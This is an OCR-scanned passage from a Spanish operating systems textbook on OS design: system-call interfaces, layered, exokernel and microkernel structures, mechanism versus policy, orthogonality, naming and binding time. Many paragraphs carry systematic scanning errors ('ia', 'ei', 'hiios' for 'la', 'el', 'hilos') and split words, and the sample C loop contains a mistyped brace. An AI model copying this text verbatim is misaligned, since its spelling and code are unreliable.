ai sistema directa mantiene ei sistema operativo simpie, y a ia vez ei programador obtiene ia con¬ 
veniencia de varias formas de iiamar a exec. 

D esde i uego que tener una i i amada para manej ar todos i os casos posi bi es puede sai i rse de con- 
troi fáciimente. En UNIX, para crear un proceso se requieren dos iiamadas: fork seguida de exec. 
La primera no tiene parámetros: ia segunda tiene tres. En contraste ia iiamada a iaAPI Win32 para 
crear un proceso (createProcess) tiene 10 parámetros, uno de ios cuaies es un apuntador a una es¬ 
tructura con 18 parámetros adicionaies. 

Flace mucho tiempo, aiguien debió haber preguntado si ocurriría aigo terribieai omitir aigunos 
de estos parámetros. La respuesta sincera hubiera sido que en aigunos casos, ios programadores tai 
vez tendrían que reaiizar más trabajo para iograr un efecto específico, pero ei resuitado neto hubie¬ 
ra sido un sistema operativo más simpie, pequeño y confiabie. Desde iuego que ia persona con ia 
proposición de 10 -F18 parámetros podría haber respondido: "Pero a ios usuarios Íes gustan todas 
estas características". La répiica podría haber sido que Íes gustan ios sistemas que uti i izan poca me¬ 
moria y nunca tienen faiias. Los sacrificios entre obtener más funcionaiidad a costa de más memo¬ 
ria son por io menos visibies, y se Íes puede asignar un precio (ya que se conoce ei precio de ia 
memoria). Sin embargo, es difícii estimar ias faiias adicionaies por año que agregará cierta carac¬ 
terística, y si ios usuarios reaiizarían ia misma decisión si conocieran ei precio ocuito. Este efecto 
se puede resumir en ia primera iey dei software deTanenbaum: 

Ai agregar más código se agregan más errores 

A i agregar más características se agrega más código y consecuentemente más errores. Los progra¬ 
madores que creen que ai agregar nuevas características no se agregan nuevos errores son nuevos 
en ias computadoras, o creen que ei hada de ios dientes anda por ahí cuidándoios. 
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La simplicidad no es la única cuestión que se debe considerar al diseñar las llamadas al siste¬ 
ma. Una consideración importante es el eslogan de Lampson (1984): 

No ocultes el poder. 

Si el hardware tiene una forma en extremo eficiente de realizar algo, debe exponerse a los progra¬ 
madores de manera simple y no enterrarse dentro de alguna otra abstracción. El propósito de las 
abstracciones es ocultar las propiedades indeseables, no las deseables. Por ejemplo, suponga que el 
hardware tiene una forma especial de desplazar mapas de bits extensos por la pantalla (es decir, la 
RAM de video) a una alta velocidad. Se podría justificar el tener una nueva llamada al sistema pa¬ 
ra acceder a este mecanismo, en vez de sólo proporcionar formas de leer la RA M de video y colo¬ 
carla en memoria principal, y después volver a escribir todo de nuevo. La nueva llamada sólo 
desplazaría bits y nada más. Si una llamada al sistema es rápida, los usuarios siempre pueden crear 
interfaces más convenientes encima de ella. Si es lenta, nadie la utilizará. 

Otra cuestión de diseño es la comparación entre las llamadas orientadas a conexión y aquéllas 
orientadas a no conexión. Las llamadas al sistema estándar de UNIX y Win32 para leer un archivo 
son orientadas a conexión, como útil izar el teléfono. Primero hay que abrir un archivo, después leer¬ 
lo y por último cerrarlo. Algunos protocolos de acceso a archivos también son orientados a cone¬ 
xión. Por ejemplo, para utilizar FTP el usuario primero debe iniciar sesión en la máquina remota, 
luego leer los archivos y después cerrar la sesión. 

Por otro lado, algunos protocolos de acceso a archivos remotos son orientados a no conexión. 
Por ejemplo, el protocolo Web (HTTP) no tiene conexión. Para leer una página Web sólo hay que 
pedirla: no se requiere configurar nada de antemano (se requiere una conexión TCP, pero esto es a 
un nivel más bajo del protocolo: el protocolo HTTP para acceder a la Web en sí es orientada a no 
conexión). 

El sacrificio entre cualquier mecanismo orientado a conexión y uno orientado a no conexión es 
el trabajo adicional que se requiere para establecer el mecanismo (por ejemplo, abrir el archivo) y 
la ventaja de no tener que hacerlo en las llamadas subsiguientes (que tal vez sean muchas). Para la 
E/S de archivos en una sola máquina, en donde el costo de configuración es bajo, tal vez la forma 
estándar (primero abrir y después usar) sea la mejor. Para los sistemas de archivos remotos, se pue¬ 
de hacer de ambas formas. 

Otra cuestión relacionada con la interfaz de llamadas al sistema es su visibilidad. La lista de 
llamadas al sistema requeridas por POSIX es fácil de encontrar. Todos los sistemas UNIX las ad¬ 
miten, así como un pequeño número de llamadas adicionales, pero la lista completa siempre es pú¬ 
blica. Por el contrario, M icrosoft nunca ha hecho pública la lista de llamadas al sistema de Windows 
Vista. En vez de ello se han hecho públicas la API Win32 y otrasAPIs, pero éstas contienen gran¬ 
des cantidades de llamadas en las bibliotecas (más de 10,000) y sólo un pequeño número de ellas 
son verdaderas llamadas al sistema. El argumento para hacer públicas todas las llamadas al sistema 
es que permite a los programadores saber qué es económico (las funciones que se ejecutan en espa¬ 
cio de usuario) y qué es costoso (las llamadas al kernel). El argumento para no hacerlas públicas es 
que proporcionan a los implementadores la flexibilidad de cambiar las llamadas al sistema subya¬ 
centes actuales para mejorarlas sin quebrantar los programas de usuario. 
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13.3 IMPLEMENTACION 

A hora vamos a dejar de lado las interfaces de usuario y de iiamadas ai sistema para anaiizar ia for¬ 
ma de impiementar un sistema operativo. En ias siguientes ocho secciones examinaremos aigunas 
cuestiones conceptuaies generaies reiacionadas con ias estrategias de impiementación. Después 
anaiizaremos aigunas técnicas de bajo nivei que a menudo son de utiiidad. 


13.3.1 Estructura del sistema 

Tai vez ia primera decisión que deben tomar ios impiementadores es sobre ia estructura dei siste¬ 
ma. En ia sección 1.7 examinamos ias principaies posibiiidades, y aquí ias repasaremos. En reaii- 
dad, un diseño monoiítico sin estructura no es una buena idea, excepto tai vez para un pequeño 
sistema operativo en (por ejempio) un refrigerador, pero inciuso en ese caso es discutibie. 

Sistemas en capas 

Un método razonabie que se ha estabiecido muy bien a través de ios años es un sistema en capas. 
Ei sistema THE de Dijkstra (figura 1-25) fue ei primer sistema operativo en capas. UN IX y Win¬ 
dows Vista también tienen una estructura en capas, pero es más como una forma de describir ei sis¬ 
tema que un principio reai de iineamiento utiiizado para construir ei sistema. 

Para un nuevo sistema, ios diseñadores que optan por esta ruta deben primero tener mucho cui¬ 
dado en eiegir ias capas y definir ia funcionaiidad de cada una. La capa inferior siempre debe tra¬ 
tar de ocuitar ias peores idiosincrasias dei hardware, como io haceei HAL en ia figura 11-7. Tai vez 
ia siguiente capa deba manejar ias interrupciones, ei cambio de contexto y ia M M U, para que enci¬ 
ma de esta capa ei código sea en su mayor parte independiente de ia máquina. Encima de esta ca¬ 
pa, ios distintos diseñadores tendrán gustos (y orientaciones) diferentes. Una posibiiidad es hacer 
que ia capa 3 administre ios hiios, inciuyendo ia pianificación y ia sincronización entre eiios, como 
se muestra en ia figura 13-2. La idea aquí es que desde ia capa 4 debemos tener hiios apropiados 
que se pianifiquen en forma normai y se sincronicen mediante un mecanismo estándar (por ejem¬ 
pio, ios mutexes). 

En ia capa 4 podríamos encontrar ios drivers de dispositivos, cada uno de ios cuaies se ejecu¬ 
ta como un hiio separado, con su propio estado, contador dei programa, registros, etc., posibiemen¬ 
te (pero no necesariamente) dentro dei espacio de direcciones dei kernei. Dicho diseño puede 
simpiificar de manera considerabie ia estructura de E/S, debido a que cuando ocurre una interrup¬ 
ción, se puede convertir en una iiamada a uniock en un mutex y una iiamada ai pianificador para 
programar (potenciaimente) ei hiio que recién se encuentra en ei estado iisto y que estaba bioquea- 
do en ei mutex. M INIX utiiiza este método, pero en UNIX, Linux y WindowsVista ios manejado- 
res de interrupciones se ejecutan en un área donde nadietiene ei controi, en vez de ejecutarse como 
hiios apropiados que se pueden pianificar, suspender, etc. Como una gran parte de ia compiejidad 
de cuaiquier sistema operativo está en ia E/S, vaie ia pena considerar cuaiquier técnica para que se 
pueda tratar y encapsuiar mejor. 
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Figura 13-2. U n posible diseño para un sistema operativo en niveles moderno. 
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Arriba de la capa 4 podríamos esperar encontrar la memoria virtual, uno o más sistemas de ar¬ 
chivos y los manejadoras de las llamadas al sistema. Si la memoria virtual está en un nivel más ba¬ 
jo que los sistemas de archivos, entonces la caché de bloques se puede paginar fuera de la memoria, 
con lo cual el administrador de memoria virtual puede determinar, de manera dinámica, la forma en 
que se debe dividir la memoria real entre las páginas de usuario y las de kernel, incluyendo la ca¬ 
ché. Windows Vista funciona de esta manera. 

Exokerneis 

Aunque el sistema en niveles tiene sus partidarios entre los diseñadores de sistemas, también hay 
otro campo que tiene precisamente la visión opuesta (Engler y colaboradores, 1995). Su visión se 
basa en el argumento de punta a cabo (end-to-end) (SaItzery colaboradores, 1984). Este concep¬ 
to dice que si el programa de usuario tiene que hacer algo por sí mismo, es un desperdicio realizar¬ 
lo en un nivel inferior también. 

Considere una aplicación de ese principio en el acceso a archivos remotos. Si un sistema se 
preocupa por que los datos se corrompan en el trayecto, debe hacer los arreglos para que se realice 
una suma de comprobación en cada archivo al momento de escribirlo, y esa suma de comprobación 
se debe almacenar junto con el archivo. AI transferir un archivo a través de una red, desde el disco 
de origen hasta el proceso de destino, también se transfiere la suma de comprobación y se vuelve a 
calcular en el extremo receptor. Si los dos valores no coinciden, se descarta el archivo y se vuelve 
a transferir. 

Esta comprobación es más precisa que utilizar un protocolo de red confiable, ya que también 
atrapa los errores de disco, de memoria, de software en los enrutadores y otros errores además de 
los de transmisión de bits. El argumento de punta a cabo dice que entonces no es necesario utilizar 
un protocolo de red confiable, ya que el punto final (el proceso receptor) tiene suficiente informa¬ 
ción como para verificar que el archivo sea correcto. La única razón de utilizar un protocolo de red 
confiable en este método es para la eficiencia: es decir, para atrapar y reparar los errores de trans¬ 
misión de manera anticipada. 
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El argumento de punta a cabo se puede extender a casi todo el sistema operativo. Sostiene que 
el sistema operativo no tiene que hacer nada que el programa de usuario pueda hacer por su cuenta. 
Por ejemplo, ¿por qué tener un sistema de archivos? Sólo hay que dejar que el usuario lea y escriba 
en una porción del disco puro en una forma protegida. Desde luego que a la mayoría de los usuarios 
les gusta tener archivos, pero el argumento de punta a cabo dice que el sistema de archivos debe ser 
un procedimiento de biblioteca vinculado con cualquier programa que necesite utilizar archivos. Es¬ 
te método permite que distintos programas tengan diferentes sistemas de archivos. Esta línea de ra¬ 
zonamiento indica que todo lo que el sistema operativo debe hacer es asignar recursos en forma 
segura (por ejemplo, laCPU y los discos) entre los usuarios que compiten por ellos. El Exokernel es 
un sistema operativo construido de acuerdo con el argumento de punta a cabo (Englery colaborado¬ 
res, 1995). 

Sistemas cliente-servidor basados en microkernel 

Un compromiso entre hacer que el sistema operativo haga todo y que no haga nada es que haga un 
poco. Este diseño conlleva a un microkernel, en donde gran parte del sistema operativo se ejecuta en 
forma de procesos de servidor a nivel de usuario, como se ilustra en la figura 13-3. Este es el diseño 
más modular y flexible de todos. Lo último en flexibilidad es hacer que cada driver de dispositivo tam¬ 
bién se ejecute como un proceso de usuario, completamente protegido contra el kernel y otros drivers, 
pero incluso hacer que los drivers de dispositivos se ejecuten en el kernel aumenta la modularidad. 
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Figura 13-3. Computación cliente-servidor basada en un microkernel. 


Cuando los drivers de dispositivos están en el kernel, pueden acceder directamente a los regis¬ 
tros de los dispositivos de hardware. Cuando no están ahí se necesita cierto mecanismo para pro¬ 
veer esta funcionalidad. Si el hardware lo permite, cada proceso de driver podría recibir acceso sólo 
a los dispositivos de E/S que necesita. Por ejemplo, con la E/S por asignación de memoria, cada 
proceso de driver podría hacer que se asignara en memoria la página para su dispositivo, pero nin¬ 
guna otra página de dispositivo. Si el espacio de puertos de E/S se puede proteger en forma parcial, 
se podría hacer disponible la porción correcta del mismo para cada driver. 

Aun si no hay disponible asistencia del hardware, la idea de todas formas puede funcionar. Lo 
que se necesita entonces es una nueva llamada al sistema, disponible sólo para los procesos de dri¬ 
ver de dispositivo, que suministre una lista de pares (puerto, valor). Lo que hace el kernel es prime¬ 
ro comprobar si el proceso posee todos los puertos en la lista. De ser así, después copia los valores 
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correspondientes a los puertos para iniciar la E/S del dispositivo. Se puede utilizar una llamada si¬ 
milar para leer los puertos de E/S de una forma protegida. 

Este método evita que los drivers de dispositivos examinen (y dañen) las estructuras de datos 
del kernel, lo cual es bueno (en su mayor parte). Se podría hacer disponible un conjunto análogo de 
llamadas para permitir que los procesos de driver leyeran y escribieran en las tablas del kernel, pe¬ 
ro sólo de una manera controlada y con la aprobación del kernel. 

El principal problema con este método, y con los microkerneis en general, es la disminución 
en el rendimiento que provocan los cambios adicionales de contexto. Sin embargo, casi todo el tra¬ 
bajo en los microkerneis se realizó hace muchos años, cuando las CPUs eran mucho más lentas. 
Hoy en día, las aplicaciones que utilizan todo el poder de la CPU y no pueden tolerar una pequeña 
pérdida de rendimiento son sólo unas cuantas. Después de todo, cuando se ejecuta un procesador 
de palabras o un navegador Web, la CPU tal vez esté inactiva 95% del tiempo. Si un sistema ope¬ 
rativo basado en microkernel convirtiera un sistema poco confiable de 3 GHz en un sistema confia¬ 
ble de 2.5 GHz, probablemente pocos usuarios se quejarían. Después de todo, la mayoría de ellos 
estaban bastante felices hace sólo unos cuantos años, cuando obtuvieron su computadora anteriora 
la entonces estupenda velocidad de 1 GHz. 

Vale la pena observar que aunque los microkerneis no son populares en el escritorio, se utili¬ 
zan mucho en los teléfonos celulares, los PDAs, los sistemas industriales, los sistemas embebidos 
y los sistemas militares, en donde la alta confiabilidad es en absoluto esencial. 


Sistemas extensibles 

Con los sistemas cliente-servidor antes descritos, la idea era eliminar la mayor parte del kernel 
que fuera posible. El método opuesto es colocar más módulos en el kernel, pero de forma prote¬ 
gida. La palabra clave aquí es protegida, desde luego. En la sección 9.5.6 estudiamos algunos me¬ 
canismos de protección que en un principio eran para importar applets por Internet, pero se 
pueden aplicar de igual forma para insertar código externo en el kernel. Los más importantes son 
las cajas de arena y la firma de código, ya que la interpretación en realidad no es práctica para el 
código de kernel. 

Desde luego que un sistema extensible en sí no es una forma de estructurar un sistema opera¬ 
tivo. Sin embargo, al empezar con un sistema mínimo que consista de un poco más que un meca¬ 
nismo de protección, y después agregar módulos protegidos al kernel, uno a la vez hasta que se 
obtenga la funcionalidad deseada, se puede crear un sistema mínimo para la aplicación que se tie¬ 
ne a la mano. En este caso, un nuevo sistema operativo se puede optimizar para cada aplicación al 
incluir sólo las partes que requiere. Paramecium es un ejemplo de dicho sistema (Van Doorn, 2001). 


H ¡los del kernel 

Otra cuestión relevante aquí, sin importar el modelo de estructuración seleccionado, es la délos hi¬ 
los del sistema. Algunas veces es conveniente permitir que existan hilos del kernel, separados de 
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cualquier proceso de usuario. Estos hilos se pueden ejecutar en segundo plano para escribir páginas 
sucias al disco, intercambiar procesos entre la memoria principal y el disco, etc. De hecho, el mis¬ 
mo kernel se puede estructurar por completo mediante dichos hilos, de manera que cuando un usua¬ 
rio realice una llamada al sistema, en vez de que el hilo del usuario se ejecute en modo de kernel, 
se bloquee y pase el control a un hilo del kernel que se encargará de hacer el trabajo. 

Además de los hilos del kernel que se ejecutan en segundo plano, la mayoría de los sistemas 
operativos inician muchos procesos tipo demonios en segundo plano. Aunque éstos no forman par¬ 
te del sistema operativo, a menudo realzan actividades de tipo del "sistema". Algunas de ellas son 
el obtener y enviar correo electrónico, y dar servicio a varios tipos de peticiones para los usuarios 
remotos, como FTP y páginas Web. 


13.3.2 C omparación entre mecanismo y directiva 

Otro principio que ayuda a la coherencia arquitectónica, además de mantener todo pequeño y bien 
estructurado, es el de separar el mecanismo de la directiva. AI colocar el mecanismo en el sistema 
operativo y dejar la directiva a los procesos de usuario, el sistema en sí puede quedar sin modifica¬ 
ción, incluso si existe la necesidad de cambiar de directiva. Aun si el módulo déla directiva se tie¬ 
ne que mantener en el kernel, de ser posible debe estar aislado del mecanismo para que los cambios 
en el módulo de la directiva no afecten al módulo del mecanismo. 

Para que la división entre directiva y mecanismo sea más clara, vamos a considerar dos ejem¬ 
plos reales. Como primer ejemplo tenemos a una empresa grande que tiene un departamento de 
nóminas, el cual está a cargo de pagar los salarios de los empleados. Tiene computadoras, softwa¬ 
re, cheques bancarios, acuerdos con los bancos y más mecanismo para realizar los pagos de los sa¬ 
larios. Sin embargo, la directiva (determinar cuánto se paga a cada quién) está completamente 
separada y es la administración quien decide sobre ella. El departamento de nóminas sólo hace lo 
que se le indica. 

Como segundo ejemplo consideremos un restaurante. Tiene el mecanismo para servir comidas, 
incluyendo las mesas, los platos, los meseros, una cocina llena de equipo, acuerdos con las compa¬ 
ñías de tarjetas de crédito, etc. El chef establece la directiva: a saber, lo que hay en el menú. Si el 
chef decide servir grandes filetes en vez de tofú, el mecanismo existente puede manejar esta nueva 
directiva. 

Ahora consideremos algunos ejemplos del sistema operativo. Primero veremos la programa¬ 
ción de hilos. El kernel podría tener un planificador de prioridades, con k niveles de prioridad. El 
mecanismo es un arreglo indexado por nivel de prioridad, como es el caso en UNIX y Windows 
Vista. Cada entrada es la parte inicial de una lista de hilos listos en ese nivel de prioridad. El plani¬ 
ficador sólo busca el arreglo de la prioridad más alta a la prioridad más baja, y selecciona el primer 
hilo que encuentra. La directiva es establecer las prioridades. Por ejemplo, el sistema puede tener 
distintas clases de usuarios, cada uno con una prioridad distinta. También podría permitir que los 
procesos de usuario establezcan la prioridad relativa de sus hilos. Las prioridades se podrían incre¬ 
mentar después de completar una operación de E/S, o se podrían reducir después de utilizar un 
quantum. Hay muchas otras directivas que se podrían seguir, pero la idea aquí es la separación en¬ 
tre establecer la directiva y llevarla a cabo. 
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Un segundo ejemplo es la paginación. Ei mecanismo impiica ia administración de ia M M U, 
iievar iistas de páginas ocupadas y páginas iibres, y código para transportar páginas hacia/desde ei 
disco. La directiva es decidir io que se debe hacer cuando ocurre un faiio de página. Podría ser io- 
cai o giobai, basado en LRU o en PEPS o cuaiquier otra cosa, pero este aigoritmo puede (y debe) 
estar separado por compieto de ia mecánica de administrar reaimente ias páginas. 

Un tercer ejempio es permitir cargar móduios en ei kernei. Ei mecanismo trata sobre ia forma 
en que se insertan y se vincuian, qué iiamadas pueden hacer y qué iiamadas se pueden hacer con 
eiios. La directiva es determinar quién puede cargar un móduio en ei kernei, y qué móduios puede 
cargar. Tai vez sóio ei superusuario pueda cargar móduios, pero tai vez cuaiquier usuario pueda car¬ 
gar un móduio que ia autoridad apropiada haya firmado en forma digitai. 


13.3.3 Ortogonalidad 

Ei buen diseño de sistemas consiste en conceptos separados que se pueden combinar de manera 
independiente. Por ejempio, en C hay tipos de datos primitivos que inciuyen enteros, caracteres 
y números de punto fiotante. También hay mecanismos para combinar tipos de datos, inciuyen- 
do arregios, estructuras y uniones. Estas ideas se combinan de manera independiente para permi¬ 
tir arregios de enteros, arregios de caracteres, estructuras y miembros de uniones que son 
números de puntos fiotantes, etc. De hecho, una vez que se ha definido un nuevo tipo de datos, 
como un arregio de enteros, se puede utiiizar como si fuera un tipo de datos primitivo: por ejem¬ 
pio, como miembro de una estructura o de una unión. La habiiidad de combinar conceptos sepa¬ 
rados de manera independiente se conoce como ortogonalidad. Es una consecuencia directa de 
ios principios de simpiicidad e integridad. 

Ei concepto de ortogonaiidad también ocurre de varias formas en ios sistemas operativos. Un 
ejempio es ia iiamada ai sistema clone de Linux, ia cuai crea un hiio. Esta iiamada tiene un mapa 
de bits como parámetro, ei cuai permite compartir o copiar de manera individuai ei espacio de di¬ 
recciones, ei directorio de trabajo, ios descriptores de archivos y ias señaies. Si todo se copia tene¬ 
mos un nuevo proceso, iguai quefonk. Si no se copia nada, se crea un hiio en ei proceso actuai. Sin 
embargo, también es posibie crear formas intermedias de compartir que no son posibies en ios sis¬ 
temas UNIX tradicionales. Al separar las diversas características y hacerlas ortogonales, es posible 
un grado de control más detallado. 

Otro uso de la ortogonalidad es la separación del concepto de proceso del concepto de hilo en 
Windows Vista. Un proceso es un contenedor de recursos, nada más y nada menos. Un hilo es una 
entidad planificable. Cuando un proceso recibe un manejador para otro proceso, no importa cuán¬ 
tos hilos tiene. Cuando un hilo se planifica, no importa a cuál proceso pertenece. Estos conceptos 
son ortogonales. 

Nuestro último ejemplo de ortogonalidad proviene de UNIX. En este sistema, la creación de 
procesos se realiza en dos pasos: forky exec. Las acciones de crear el espacio de direcciones y car¬ 
garlo con una nueva imagen de memoria son separadas, y las cosas se pueden realizar entre ambas 
(como la manipulación de los descriptores de archivos). En Windows Vista, estos pasos no se pue¬ 
den separar; es decir, los conceptos de crear un espacio de direcciones y llenarlo no son ortogona¬ 
les. La secuencia en Linux de clone y exec es más ortogonal, ya que incluso hay disponibles más 
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bloques de construcción detallados. Como regla general, al tener un pequeño número de elementos 
ortogonales que se pueden combinar de muchas formas se obtiene un sistema pequeño, simple y 
elegante. 


13.3.4 Nomenclatura 

La mayoría de las estructuras de datos que utiliza un sistema operativo tienen cierto tipo de nom¬ 
bre o identificador mediante el cual se puede hacer referencia a ellas. Los ejemplos obvios son los 
nombres de inicio de sesión, nombres de archivos, nombres de dispositivos, IDs de procesos, etc. 
La forma en que se construyen y administran estos nombres es una cuestión importante en el dise¬ 
ño y la implementación de sistemas. 

Los nombres que se diseñaron para los seres humanos son cadenas de caracteres en ASCII o 
Unicode, y por lo general son jerárquicos. Las rutas de directorio como /usr/ast/libros/mos2/cap- 
12 son sin duda jerárquicas, lo cual indica una serie de directorios en donde se va a realizar una 
búsqueda, empezando en el directorio raíz. Los URLs también son jerárquicos. Por ejemplo, 
www.cs.vu.nl/~ast/ indica una máquina específica (www) en un departamento específico (es), en 
una universidad específica (vu) de un país específico (ni). La parte después de la barra diagonal 
indica un archivo específico en la máquina designada, en este caso por convención: www/in- 
dex.html en el directorio de inicio de ast. Observe que los U RLs (y las direcciones DNS en gene¬ 
ral, incluyendo las direcciones de correo electrónico) son "inversos", ya que empiezan en la parte 
inferior del árbol y van hacia arriba, a diferencia de los nombres de archivos, que empiezan en la 
parte superior del árbol y van hacia abajo. Otra forma de ver esto es si el árbol se escribe desde 
la parte superior, empieza del lado izquierdo y va hacia la derecha, o si empieza del lado derecho 
y va hacia la izquierda. 

A menudo, la nomenclatura se lleva a cabo en dos niveles: externo e interno. Por ejemplo, los 
archivos siempre tienen un nombre de cadena de caracteres para que las personas lo utilicen. Ade¬ 
más, casi siempre hay un nombre interno que el sistema utiliza. En UNIX, el verdadero nombre de 
un archivo es su número de nodo-i; el nombreASCII no se utiliza en forma interna. De hecho, ni 
siquiera es único, ya que un archivo puedetener varios vínculos. El nombre interno análogo en Win¬ 
dows Vista es el índice del archivo en la M FT. El trabajo del directorio es proveer la asignación en¬ 
tre el nombre externo y el nombre interno, como se muestra en la figura 13-4. 

En muchos casos (como el ejemplo del nombre de archivo antes mostrado) el nombre interno 
es un entero sin signo que sirve como índice en una tabla del kernel. Otros ejemplos de nombres de 
índice de tabla son los descriptores de archivos en U NIX y los manejadores de objetos en Windows 
Vista. Observe que ninguno de ellos tiene representación externa. Son para uso exclusivo del siste¬ 
ma y los procesos en ejecución. En general, es conveniente utilizar índices de tablas para los nom¬ 
bres transitorios que se pierden cuando se reinicia el sistema. 

A menudo los sistemas operativos aceptan varios espacios de nombres, tanto externos como in¬ 
ternos. Por ejemplo, en el capítulo 11 analizamos tres espacios de nombres externos que Windows 
Vista admite: nombres de archivos, nombres de objetos y nombres del registro (y también está el 
espacio de nombres deActive Directory, que no analizamos). Además, hay innumerables espacios 
de nombres internos que utilizan enteros con signo; por ejemplo, los manejadores de objetos y las 
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Nombre externo: /usr/ast/libros/mos2/Cap-12 


«v._ _ J 

V 


- Directorio: /usr/ast/iibros/mos2 


Tabia de nodos-i 



Figura 13-4. Los directorios se utiiizan para asignar nombres externos en nombres 
internos. 


entradas en la M FT. A unque los nombres en los espacios de nombres externos son cadenas de U ni- 
code, no se busca un nombre de archivo en el registro, de igual forma que no se puede utilizar un 
índice de la M FT en la tabla de objetos. En un buen diseño se considera mucho cuántos espacios de 
nombres se necesitan, cuál es la sintaxis de los nombres en cada uno, cómo se pueden distinguir 
unos de otros, si existen nombres absolutos y relativos, etcétera. 


13.3.5 Tiempo de vinculación 

Como hemos visto, los sistemas operativos utilizan varios tipos de nombres para referirse a los ob¬ 
jetos. Algunas veces la asignación entre un nombre y un objeto es fija, pero otras no. En este últi¬ 
mo caso, puede ser importante el momento en que se vincula el nombre al objeto. En general, la 

vinculación anticipada es simple pero no flexible, mientras que la vinculación postergada es más 

complicada pero a menudo más flexible. 

Para aclarar el concepto del tiempo de vinculación, veamos algunos ejemplos reales. Un ejem¬ 
plo de la vinculación anticipada es la práctica que tienen ciertos colegas de permitir que los padres 
inscriban a un bebé al nacer y paguen de antemano la colegiatura actual. Cuando el estudiante apa¬ 
rece 18 años después, la colegiatura está pagada por completo, sin importar qué tan alto sea su pre¬ 
cio en ese momento. 

En la manufactura, pedir piezas por adelantado y mantener un inventario de ellas es vincula¬ 
ción anticipada. Por el contrario, la manufactura justo a tiempo requiere que los proveedores pue¬ 
dan suministrar las piezas al momento, sin requerir un aviso por adelantado. Esto es vinculación 
postergada. 

A menudo los lenguajes de programación admiten varios tiempos de vinculación para las va¬ 
riables. Las variables globales se vinculan a una dirección virtual específica mediante el compila¬ 
dor. Esto ejemplifica la vinculación anticipada. A las variables locales para un procedimiento se les 
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asigna una dirección virtuai (en ia piia) cuando se invoca ei procedimiento. Esto es vincuiación in¬ 
termedia. A ias variabies que se aimacenan en ei montícuio (ias que se asignan mediante maiioc en 
C o new en Java) se Íes asignan direcciones virtuai es sóio cuando reai mente se uti i izan. Aquí tene¬ 
mos una vincuiación postergada. 

Con frecuencia, ios sistemas operativos utiiizan ia vincuiación anticipada para ia mayoría de 
ias estructuras de datos, pero en ocasiones utiiizan ia vincuiación postergada por fiexibiiidad. La 
asignación de memoria es un buen ejempio. Los primeros sistemas de muitiprogramación en ias 
máquinas que no contaban con hardware de reasignación de direcciones tenían que cargar un pro¬ 
grama en cierta dirección de memoria y reubicario para que se ejecutara ahí. Si aiguna vez se inter¬ 
cambiaba, se tenía que traer de vueita a ia misma dirección de memoria o faiiaría. Por ei contrario, 
ia memoria virtuai paginada es una forma de vincuiación postergada. La dirección física actuai que 
corresponde a una dirección virtuai dada no se conoce sino hasta que se hace contacto con ia pági¬ 
na y se regresa a ia memoria. 

Otro ejempio de vincuiación postergada es ia coiocación de ventanas en una GUI. Ai contrario 
de ios primeros sistemas gráficos, en donde ei programador tenía que especificar ias coordenadas 
absoiutas en pantaiia para todas ias imágenes, en ias GUIs modernas ei software utiiiza coordena¬ 
das reiativas ai origen de ia ventana, pero eso no se determina sino hasta que ia ventana se coioca 
en ia pantaiia, e inciuso se puede cambiar más adeiante. 

13.3.6 C omparación entre estructuras estáticas y dinámicas 

Los diseñadores de sistemas operativos se ven forzados constantemente a eiegir entre ias estructu¬ 
ras de datos estáticas y ias dinámicas. Las estáticas siempre son más fáciies de entender o de pro¬ 
gramar, y su uso es más rápido: ias dinámicas son más fiexibies. Un ejempio obvio es ia tabia de 
procesos. Los primeros sistemas simpiemente asignaban un arregio fijo de estructuras por proceso. 
Si ia tabia de procesos contenía 256 entradas, entonces sóio 256 procesos podían existir en cuai- 
quier instante. Un intento de crear ei proceso 257 fracasaría por faita de espacio en ia tabia. Para ia 
tabia de archivos abiertos (tanto por usuario como para todo ei sistema) y muchas otras tabias dei 
kernei seapiicaban consideraciones si mi iares. 

Una estrategia aiternativa es crear ia tabia de procesos como una iista vincuiada de minitabias, 
en donde ai principio sóio hay una. Si esta tabia se iiena, se asigna otra de una reserva de aimace- 
namiento giobai y se vincuia con ia primera. De esta forma, ia tabia de procesos no se puede henar 
sino hasta que se agote toda ia memoria dei kernei. 

Por otra parte, ei código para buscar en ia tabia sevueivemás compiicado. Por ejempio, ei có¬ 
digo para buscar en una tabia de procesos estática un PID específico (pid) se muestra en ia figura 
13-5. Es simpie y eficiente. Para hacer io mismo en una iista de minitabias vincuiadas se requiere 
más trabajo. 

Las tabias estáticas son mejores cuando hay mucha memoria, o cuando ei uso de ias tabias se 
puede pronosticar con suficiente precisión. Por ejempio, en un sistema con un soio usuario es im- 
probabie que éste inicie más de 64 procesos a ia vez, y no es un desastre totai si fracasa ei intento 
de iniciar ei proceso 65. 

Otra aiternativa es utiiizar una tabia de tamaño fijo, que ai momento de iienarse asigne una 
nueva tabia de tamaño fijo, por ejempio, dei dobiedei tamaño. A sí, ias entradas actuai es se copian 
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encontró = 0; 

for (p = &tabla_proc[0]; p < &tabla_proc[TAMANIO_TABLA_PROC]; p++) { 
if {p->pid_proc == pid) { 
encontró = 1; 
break; 

} 

} 


Figura 13-5. Código para buscar en la tabla de procesos un PID específico. 

a la nueva tabla y la antigua se regresa a la reserva de almacenamiento libre. De esta forma, la ta¬ 
bla siempre es contigua en vez de estar vinculada. La desventaja aquí es que se requiere cierta ad¬ 
ministración del almacenamiento, y la dirección de la tabla es ahora una variable en vez de una 
constante. 

En las pilas del kernel se aplica una cuestión similar. Cuando un hilo cambia al modo de kernel, 
o cuando se ejecuta un hilo en modo de kernel, necesita una pila en el espacio del kernel. Para los 
hilos de usuario, la pila se puede inicialziar para que avance hacia abajo desde la parte superior del 
espacio de direcciones virtuales, por lo que no hay que especificar el tamaño por adelantado. Para 
los hilos de kernel, el tamaño se debe especificar por adelantado debido a que la pila ocupa cierto es¬ 
pacio de direcciones virtuales del kernel y puede haber muchas pilas. La pregunta es: ¿Cuánto espa¬ 
cio debe obtener cada una? Los sacrificios aquí son similares a los de la tabla de procesos. 

Otro sacrificio estático-dinámico es la programación de procesos. En algunos sistemas, en es¬ 
pecial los de tiempo real, la programación se puede realizar de manea estática por adelantado. Por 
ejemplo, una aerolínea sabe a qué hora saldrán sus vuelos semanas antes de su partida. De manera 
similar, los sistemas multimedia saben cuándo planificar los procesos de audio, video y otros por 
adelantado. Para el uso de propósito general, estas consideraciones no se aplican y la planificación 
debe ser dinámica. 

Otra cuestión estática-dinámica es la estructura del kernel. Es mucho más simple si el kernel se 
crea como un solo programa binario y se carga en memoria para ejecutarse. Sin embargo, la conse¬ 
cuencia de este diseño es que para agregar un nuevo dispositivo de E/S se requiere volver a vincu¬ 
lar el kernel con el nuevo controlador de dispositivo. Las primeras versiones de UN IX funcionaban 
